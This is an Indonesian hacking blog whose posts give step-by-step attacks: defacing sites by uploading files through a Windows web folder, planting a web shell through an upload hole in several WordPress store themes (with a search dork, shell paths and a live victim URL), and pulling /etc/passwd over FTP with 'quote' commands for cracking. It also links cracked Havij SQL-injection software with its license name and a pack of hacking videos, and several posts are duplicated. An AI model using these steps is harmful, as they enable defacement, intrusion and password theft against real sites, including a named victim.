Met siang blogger semua, berjumpa lagi dengan saya, mungkin kali ini saya akan menerangkan "bagaimanakah cara deface web dengan trik di windows7, atau lengkapnya adalah deface web melalui web folder" ok,, langsung saja lumayan nih buat Lamer macam saya :D ,, perhatikan cara di bawah ini:
1. Persiapkan File yang akan di upload contoh Hacked.html.
2. Buka Windows Explorer
3. Kemudian di tampilan Windows Explorer klik Kanan dan pilih Add a Network Connection
4. Selanjutnya Klik Next pada Internet or Network Address. lalu isikan URL target yang akan di deface.
5. Klik Next dan tunggu Proses nya sampai selesai lama tidaknya tergantung internetmu
6. Selanjutnya memberikan nama web folder klik nekt saja langsung karena secara otomatis akan memberikan nama sesuai alamat website tsb.
7. Klik Finis dan WebFolder tersebut akan muncul di Windows Explorer
8. Langkah selanjutnya memaskuan file yang akan di pindahkan ke Web Folder tersebut. [ex : Hacked.html]
9. Untuk membuka hasil deface nya http://target.com/Hacked.html
ok. mungkin itu saja penjelasannya,, bagi yang mau mencoba silahkan di coba dan resiko tanggung sendiri,, :D
Nb : semua tread yang mengenai Tekhnik2 Hacking saya share hanya untuk bahan pembelajaran saja atas kerugian pihak lain saya tidak bertanggung jawab. Trima kasih.
skdcyber
Hacking And Phreaking Provider
Selamat datang.. !
Semua tread yang berhubungan dengan Blog ini, adalah merupakan suatu bahan pembelajaran dan berbagi informasi bagi penulis atau pun pembaca.
Terima kasih.
Terima kasih.
Minggu, 12 Agustus 2012
Minggu, 03 Juni 2012
Vulnerability themes wordpress
dork : inurl:/wp-content/themes/
WPstore/
kita dapat meng-upload backdoor
dengan vulnerability ini:
1. WPStore
2. eShop
3. KidzStore
4. Emporium
5. Store
klo udah dpet target, kita tambah /
UPLOAD di target tersebut...
http://www.target.com/wp-
content/themes/Wpstore/upload
selanjutnya akan muncul file
upload,sekarang kita upload shell
kesayangan.... klo udah di upload,
tinggal eksekusi shell kita...
caranya :
http://www.target.com/wp-
content/uploads/products_img/
namashell.php
selesai dehhh..... sekrang terserah
mau di apain tuh sitenya... :D
klo msih bngung, sya ksih live
trgetnya....
http://www.davidsteele.com/wp-
content/themes/WPStore/upload/
Thanks to: zer0cool
WPstore/
kita dapat meng-upload backdoor
dengan vulnerability ini:
1. WPStore
2. eShop
3. KidzStore
4. Emporium
5. Store
klo udah dpet target, kita tambah /
UPLOAD di target tersebut...
http://www.target.com/wp-
content/themes/Wpstore/upload
selanjutnya akan muncul file
upload,sekarang kita upload shell
kesayangan.... klo udah di upload,
tinggal eksekusi shell kita...
caranya :
http://www.target.com/wp-
content/uploads/products_img/
namashell.php
selesai dehhh..... sekrang terserah
mau di apain tuh sitenya... :D
klo msih bngung, sya ksih live
trgetnya....
http://www.davidsteele.com/wp-
content/themes/WPStore/upload/
Thanks to: zer0cool
Sabtu, 02 Juni 2012
Hacking Shell lewat ftp
Kebanyakan paswordnya id
sembunyikan /shadowed, tapi kamu
masih bisa mendapatkannya dg
meng-finger atau menebak
passwordnya untuk loginnya.
Kamu dapat memulainya dg
membuka/memasuki sebuah shell,
dan kamu tidak perlu/tidak harus
menggunakan/ berada didalam
sebuah ftp server.berikut langkah
langkahnya :
1.jalankan prompt
2.Tuliskan command untuk
membuka dos command prompt
3.tuliskan ftp server.to.hack.com
(nama servernya!!)
4.Akan muncul prompt login.. tekan
enter saja (tidak perlu menuliskan
apa apa)
5.Akan muncul password login..
tekan saja enter...
6.sekarang ketiklah "quote user ftp"
dan tekan enter
7.lalu ketik "quote cwd ~root" tekan
enter
8.dan ketikan "quote pass ftp" tekan
enter
Sekarang kamu sudah memiliki guest
access dan dapat mendownload
password file.. and have a fuckin'
shit with that
9.ketiklah "cd etc" tekan enter..
untuk mendapatkan -etc directory-
yg berisi file password
10.ketiklah "get passwd" untuk
mendownload passw.file ke HD mu
Sekarang kamu suda memiliki
password file dan kamu dapat
membukanya di C:\passwd dengan
menggunakan notepad
Jika file tersebut di enkripsi.. kamu
bisa meng-crackernya.. dan jika tidak
dienkripsi.. (You lucky) kamu dapat
mencocokan antara user login dg
passwordnya.
Special thanks to : Zetc0d3
sembunyikan /shadowed, tapi kamu
masih bisa mendapatkannya dg
meng-finger atau menebak
passwordnya untuk loginnya.
Kamu dapat memulainya dg
membuka/memasuki sebuah shell,
dan kamu tidak perlu/tidak harus
menggunakan/ berada didalam
sebuah ftp server.berikut langkah
langkahnya :
1.jalankan prompt
2.Tuliskan command untuk
membuka dos command prompt
3.tuliskan ftp server.to.hack.com
(nama servernya!!)
4.Akan muncul prompt login.. tekan
enter saja (tidak perlu menuliskan
apa apa)
5.Akan muncul password login..
tekan saja enter...
6.sekarang ketiklah "quote user ftp"
dan tekan enter
7.lalu ketik "quote cwd ~root" tekan
enter
8.dan ketikan "quote pass ftp" tekan
enter
Sekarang kamu sudah memiliki guest
access dan dapat mendownload
password file.. and have a fuckin'
shit with that
9.ketiklah "cd etc" tekan enter..
untuk mendapatkan -etc directory-
yg berisi file password
10.ketiklah "get passwd" untuk
mendownload passw.file ke HD mu
Sekarang kamu suda memiliki
password file dan kamu dapat
membukanya di C:\passwd dengan
menggunakan notepad
Jika file tersebut di enkripsi.. kamu
bisa meng-crackernya.. dan jika tidak
dienkripsi.. (You lucky) kamu dapat
mencocokan antara user login dg
passwordnya.
Special thanks to : Zetc0d3
Selasa, 29 Mei 2012
52 Video Tutorials - Network Hacking
A Penetration Attack Reconstructed
A Quick and Dirty Intro to Nessus using the Auditor Boot CD!
Adding Modules to a Slax or Backtrack Live CD from Windows
Airplay replay attack – no wireless client required
Anonym.OS LiveCD with build in Tor Onion routing and Privoxy
BackTrack LiveCD to HD Installation Instruction Video
Basic Nmap Usage!
Basic Tools for Wardriving!
Bluesnarfer attack tool demonstration
Bluesnarfing a Nokia 6310i hand set
Breaking WEP in 10 minutes
Cain to ARP poison and sniff passwords!
Complete Hacking Video using Metasploit – Meterpreter
Cracking a 128 bit WEP key (Auditor)
Cracking a 128 Bit Wep key + entering the cridentials
Cracking Syskey and the SAM on Windows Using Samdump2 and John!
Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!
Cracking WPA Networks (Auditor)
DoS attack against Windows FTP Server – DoS
Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!
Exploiting some bugs of tools used in Windows
Exploiting weaknesses of PPTP VPN (Auditor)
Finding Rogue SMB File Shares On Your Network!
Fun with Ettercap Filters!
How to crack the local windows passwords in the SAM database
How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor)
How to sniff around switches using Arpspoof and Ngrep!
Install VNC Remotely!
Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res)
Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res)
John The Ripper 1.7 password cracker Installation Instruction Video
Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!
MAC Bridging with Windows XP and Sniffing!
Mass De-Authentication using void11 (Auditor)
Metasploit Flash Tutorial!
MITM Hijacking
Nmap Video Tutorial 2 Port Scan Boogaloo!
Sniffing logins and passwords
Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res)
Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res)
Sniffing VoIP Using Cain!
Snort Instruction video – howto install into backtrack
SSH Dynamic Port Forwarding!
Start a session and get interactive commandline access to a remote Windows box!
Telnet Bruteforce
Tunneling Exploits through SSH
Use Brutus to crack a box running telnet!
Using NetworkActiv to sniff webpages on a Wi-Fi network!
WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0)
WMF File Code Execution Vulnerability With Metasploit!
WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0)
A Quick and Dirty Intro to Nessus using the Auditor Boot CD!
Adding Modules to a Slax or Backtrack Live CD from Windows
Airplay replay attack – no wireless client required
Anonym.OS LiveCD with build in Tor Onion routing and Privoxy
BackTrack LiveCD to HD Installation Instruction Video
Basic Nmap Usage!
Basic Tools for Wardriving!
Bluesnarfer attack tool demonstration
Bluesnarfing a Nokia 6310i hand set
Breaking WEP in 10 minutes
Cain to ARP poison and sniff passwords!
Complete Hacking Video using Metasploit – Meterpreter
Cracking a 128 bit WEP key (Auditor)
Cracking a 128 Bit Wep key + entering the cridentials
Cracking Syskey and the SAM on Windows Using Samdump2 and John!
Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!
Cracking WPA Networks (Auditor)
DoS attack against Windows FTP Server – DoS
Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!
Exploiting some bugs of tools used in Windows
Exploiting weaknesses of PPTP VPN (Auditor)
Finding Rogue SMB File Shares On Your Network!
Fun with Ettercap Filters!
How to crack the local windows passwords in the SAM database
How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor)
How to sniff around switches using Arpspoof and Ngrep!
Install VNC Remotely!
Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res)
Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res)
John The Ripper 1.7 password cracker Installation Instruction Video
Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!
MAC Bridging with Windows XP and Sniffing!
Mass De-Authentication using void11 (Auditor)
Metasploit Flash Tutorial!
MITM Hijacking
Nmap Video Tutorial 2 Port Scan Boogaloo!
Sniffing logins and passwords
Sniffing Remote Router Traffic via GRE Tunnels (Hi-Res)
Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res)
Sniffing VoIP Using Cain!
Snort Instruction video – howto install into backtrack
SSH Dynamic Port Forwarding!
Start a session and get interactive commandline access to a remote Windows box!
Telnet Bruteforce
Tunneling Exploits through SSH
Use Brutus to crack a box running telnet!
Using NetworkActiv to sniff webpages on a Wi-Fi network!
WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0)
WMF File Code Execution Vulnerability With Metasploit!
WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0)
Download 52 Video Tutorials - Network Hacking
Filesonic.com
http://www.filesonic.com/file/3733596075/52.Video.Tutorials-Network.Hacking.part1.rar
http://www.filesonic.com/file/3733596085/52.Video.Tutorials-Network.Hacking.part2.rar
http://www.filesonic.com/file/3733596095/52.Video.Tutorials-Network.Hacking.part3.rar
Wupload.com
http://www.wupload.com/file/2326319202/52.Video.Tutorials-Network.Hacking.part1.rar
http://www.wupload.com/file/2326319207/52.Video.Tutorials-Network.Hacking.part2.rar
http://www.wupload.com/file/2326319212/52.Video.Tutorials-Network.Hacking.part3.rar
Filesonic.com
http://www.filesonic.com/file/3733596075/52.Video.Tutorials-Network.Hacking.part1.rar
http://www.filesonic.com/file/3733596085/52.Video.Tutorials-Network.Hacking.part2.rar
http://www.filesonic.com/file/3733596095/52.Video.Tutorials-Network.Hacking.part3.rar
Wupload.com
http://www.wupload.com/file/2326319202/52.Video.Tutorials-Network.Hacking.part1.rar
http://www.wupload.com/file/2326319207/52.Video.Tutorials-Network.Hacking.part2.rar
http://www.wupload.com/file/2326319212/52.Video.Tutorials-Network.Hacking.part3.rar
Special thanks to : Black.exe
Sabtu, 26 Mei 2012
Dork SQLi + Havij + License
Semua dapat dilakukan dengan manual ataupun dengan tools SQLi, kalau mau pakai Havij yang sudah ada kode License nya yaitu Havij v 1.15 Pro Advanced SQL Injection +license. Silahkan comot di SINI . Dan cara installnya perhatikan berikut ini.
1. Scan dulu exenya atau etrack exe bagi yang ragu kalo ada goncengan di exe havijnya..
2. Run Havij
3. Klik Register (Butuh Koneksi Internet)
4. Dinamanya ketikan atau paste ini : Cracked@By.Exidous
5. Masukan licensi / key.. ( HavijKey.lic )
Sub info: black-c0de
Langganan:
Postingan (Atom)